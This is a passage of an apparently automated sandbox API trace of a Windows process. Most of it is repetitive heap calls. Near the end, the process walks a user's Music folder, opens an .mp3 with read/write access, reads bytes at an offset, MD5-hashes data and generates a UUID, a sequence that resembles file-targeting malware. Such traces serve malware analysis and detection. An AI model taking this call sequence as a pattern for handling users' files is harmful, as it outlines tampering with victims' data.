(HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.707] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.707] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.708] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.708] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.709] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.709] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.710] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.710] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.711] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.711] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.712] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.712] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.713] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.713] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.714] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\") returned="kddg-2aSE\\" [0097.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\") returned="2s0-\\" [0097.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.714] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.714] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.714] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.714] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.714] PathFindFileNameW (pszPath="") returned="" [0097.714] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\7huE.mp3") returned=".mp3" [0097.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\7huE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\7hue.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.715] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=89676) returned 1 [0097.715] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.718] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15e26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.718] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.720] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0097.721] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.721] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.721] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.721] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.721] GetLastError () returned 0x0 [0097.721] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.721] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0097.721] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.721] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.721] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.721] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.721] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15e50) returned 0x9a06a00 [0097.722] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.722] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.722] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb848 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb890 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.723] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.723] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.723] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f70 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f58 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.724] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.724] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.725] GetCurrentThreadId () returned 0x8c4 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa070 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.725] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.725] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.725] GetCurrentThreadId () returned 0x8c4 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.726] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.726] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.727] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.727] RtlAllocateHeap 